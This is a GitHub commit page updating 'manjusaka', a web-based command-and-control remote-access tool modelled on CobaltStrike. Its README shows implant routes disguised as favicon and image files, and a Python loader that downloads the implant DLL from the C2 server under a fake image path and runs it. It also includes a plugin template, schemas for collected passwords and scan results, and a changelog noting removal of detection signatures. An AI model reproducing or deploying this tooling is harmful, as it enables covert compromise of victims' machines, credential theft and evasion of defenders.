Skip to content

Commit 2c6c8c6

Browse files
author
ydhcui
committed
update 0.5
### v0.5 1、修复安全漏洞 2、开放NPC配置修改功能 3、上传文件流程优化 4、增加动态插件功能,可拓展更多功能 5、去除特征、修复bug
1 parent 831b5e9 commit 2c6c8c6

27 files changed

+12528
-10
lines changed

README.md

Lines changed: 137 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -13,25 +13,151 @@
1313
# manjusaka
1414
牛屎花 一款基于WEB界面的仿CobaltStrike C2远控
1515

16-
##系统架构: ![164759109](https://user-images.githubusercontent.com/46884495/159195361-cc3b75f1-ab5e-425b-a3b3-65d65878c048.jpg)
16+
##系统架构: ![](./images/1.jpg)
1717

18-
##操作截图:
18+
## 使用方法
19+
```bash
20+
[root@devops nps]# ./manjusaka
21+
[NPS] 2022/09/14 15:57:21 初始用户: manjusaka 密码: ZbFCa2L2LRd5
22+
[NPS] 2022/09/14 15:57:21 创建项目: 公共项目 没有归属的npc放在这个项目里面
23+
[NPS] 2022/09/14 15:57:21 监听项目路由: VHOS5vqN
24+
[NPS] 2022/09/14 15:57:21 NPS监听地址 :3200
25+
[NPS] 2022/09/14 15:57:21 NPU后台地址 : manjusaka
26+
[NPS] 2022/09/14 15:57:21 NPC监听地址 :801
27+
[NPS] 2022/09/14 15:57:21 NPC交互路由 : /:target/favicon.ico
28+
[NPS] 2022/09/14 15:57:21 NPC下载路由 : /:target/assert/:sys/bg.jpg
29+
[NPS] 2022/09/14 15:57:21 NPC文件路由 : /images/:fid/logo.png
30+
```
31+
则NPS访问地址为 http://192.168.93.217:3200/manjusaka
1932

20-
![微信截图_20220406181015](https://user-images.githubusercontent.com/46884495/161952357-d9a86804-0b52-4866-b1f9-2148746f744d.png)
2133

22-
![微信截图_20220318162038](https://user-images.githubusercontent.com/46884495/159195383-348e6fb1-3516-40be-9522-5c562e626d36.png)
34+
1、创建项目,默认有一个公共项目,选择当前项目后 可在回传结果里面查看当前项目回传的信息
2335

24-
![微信截图_20220318162241](https://user-images.githubusercontent.com/46884495/159195398-bf7b2cd1-cbae-4d23-a101-fc8311c24949.png)
36+
![](./images/1.jpg)
2537

26-
![微信截图_20220406180114](https://user-images.githubusercontent.com/46884495/161950618-aadf6240-5672-4756-b103-f8be08f55747.png)
2738

28-
## 使用方法
29-
./manjusaka -h
39+
2、根据项目 生成npc 可以直接使用exe或elf格式的npc。也可以使用其它语言加载npc母体 比如使用python加载npc
3040

31-
默认 ./manjusaka -h vpsip
41+
```python
42+
import requests
43+
from ctypes import cdll
44+
45+
res = requests.get("http://192.168.93.217:801/bq1iFEP2/assert/dll/bg.jpg")
46+
with open("a.dll","wb") as f:
47+
f.write(res.content)
48+
49+
dll = cdll.LoadLibrary("a.dll")
50+
dll.main()
51+
52+
```
53+
54+
55+
![](./images/2.jpg)
56+
57+
3、npc上线,点选中该npc即可对其进行操作
58+
59+
![](./images/3.jpg)
60+
61+
![](./images/4.jpg)
62+
63+
![](./images/5.jpg)
64+
65+
![](./images/6.jpg)
66+
67+
![](./images/7.jpg)
68+
69+
![](./images/8.jpg)
70+
71+
72+
4、插件系统 生成dll/so插件, 以plug_name_nps.dll格式命名放到plugins文件夹下面 即可动态调用
73+
插件开发示例, main传入插件运行参数 传出返回的内容值
74+
```rust
75+
/*
76+
//./Cargo.toml
77+
[lib]
78+
path = "src/lib.rs"
79+
crate-type = ["cdylib"]
80+
*/
81+
82+
//src/lib.rs
83+
84+
use std::ffi::CStr;
85+
use std::ffi::CString;
86+
use std::os::raw::c_char;
87+
88+
#[no_mangle]
89+
pub unsafe extern "C" fn main(args: *const c_char) -> *const c_char {
90+
let r_str = CStr::from_ptr(args).to_str().unwrap();
91+
92+
println!("plugin load args: {}", r_str);
93+
let c_str = format!("plugin return {}",r_str);
94+
95+
CString::new(c_str).expect("CString failed").into_raw()
96+
}
97+
98+
```
99+
返回值匹配到如下protobuf格式后后将结果写入数据库
100+
101+
```protobuf
102+
syntax = "proto3";
103+
104+
message PassResult{
105+
string username = 1;
106+
string password = 2;
107+
string passtype = 3;
108+
string passfrom = 4;
109+
}
110+
111+
message PassScan{
112+
string hosts = 1;
113+
string ports = 2;
114+
string args = 3;
115+
repeated PortResult result = 4;
116+
}
117+
118+
message PortResult{
119+
string host = 1;
120+
string port = 2;
121+
string proto = 3;
122+
string version = 4;
123+
}
124+
message PortScan{
125+
string hosts = 1;
126+
string ports = 2;
127+
string args = 3;
128+
repeated PortResult result = 4;
129+
}
130+
message HttpResult{
131+
string proto = 1;
132+
string host = 2;
133+
string port = 3;
134+
string title = 4;
135+
string note = 5;
136+
}
137+
message HttpScan{
138+
string hosts = 1;
139+
string ports = 2;
140+
string args = 3;
141+
repeated PortResult result = 4;
142+
}
143+
144+
```
145+
32146

33147
## 更新
34148

149+
### v0.5
150+
1、修复安全漏洞
151+
152+
2、开放NPC配置修改功能
153+
154+
3、上传文件流程优化
155+
156+
4、增加动态插件功能,可拓展更多功能
157+
158+
5、去除特征、修复bug
159+
160+
35161
### v0.4
36162
1、随机key
37163

@@ -58,3 +184,5 @@
58184
1、实现基础远控功能。
59185

60186

187+
## 交流
188+
https://discord.gg/YMqeN5Qyk4

conf.toml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -23,7 +23,7 @@ redirect = "http://www.microsoft.com"
2323
server = ""
2424

2525
#文件操作路由,遵守gin路由规则 后端会读取target目标、和fid的值
26-
route = "/images/:target/:fid/logo.png"
26+
route = "/images/:fid/logo.png"
2727

2828
#fid有效时间(秒)
2929
fidtimeout = 3600

images/0.jpg

54 KB
Loading

images/1.png

55.2 KB
Loading

images/2.png

60.1 KB
Loading

images/3.png

55.6 KB
Loading

images/4.png

94.6 KB
Loading

images/5.png

56.7 KB
Loading

images/6.png

88.6 KB
Loading

images/7.png

55.6 KB
Loading

images/8.png

40.7 KB
Loading

manjusaka

8.47 MB
Binary file not shown.

manjusaka-0.4

-11.5 MB
Binary file not shown.

manjusaka-v0.3

-14.1 MB
Binary file not shown.

plug_demo/.cargo/config

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
[target.x86_64-pc-windows-gnu]
2+
rustflags = [
3+
"-C", "link-arg=s",
4+
]
5+
[target.x86_64-pc-windows-msvc]
6+
rustflags = [
7+
"-C", "link-arg=/DEBUG:NONE",
8+
]

plug_demo/Cargo.lock

Lines changed: 7 additions & 0 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

plug_demo/Cargo.toml

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
[package]
2+
name = "plug_test_nps"
3+
version = "0.1.0"
4+
edition = "2021"
5+
6+
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
7+
[profile.release]
8+
opt-level = "s" # Optimize for size.
9+
lto = true # Enable Link Time Optimization
10+
codegen-units = 1 # Reduce number of codegen units to increase optimizations.
11+
12+
13+
[lib]
14+
path = "src/lib.rs"
15+
crate-type = ["cdylib"]
16+
17+
18+
[dependencies]
19+

plug_demo/src/lib.rs

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
use std::ffi::CStr;
2+
use std::ffi::CString;
3+
use std::os::raw::c_char;
4+
5+
#[no_mangle]
6+
pub unsafe extern "C" fn main(s: *const c_char) -> *const c_char {
7+
let r_str = CStr::from_ptr(s).to_str().unwrap();
8+
9+
println!("plugin load: {}", r_str);
10+
let c_str = format!("plugin return {}",r_str);
11+
12+
CString::new(c_str).expect("CString failed").into_raw()
13+
}

0 commit comments

Comments
 (0)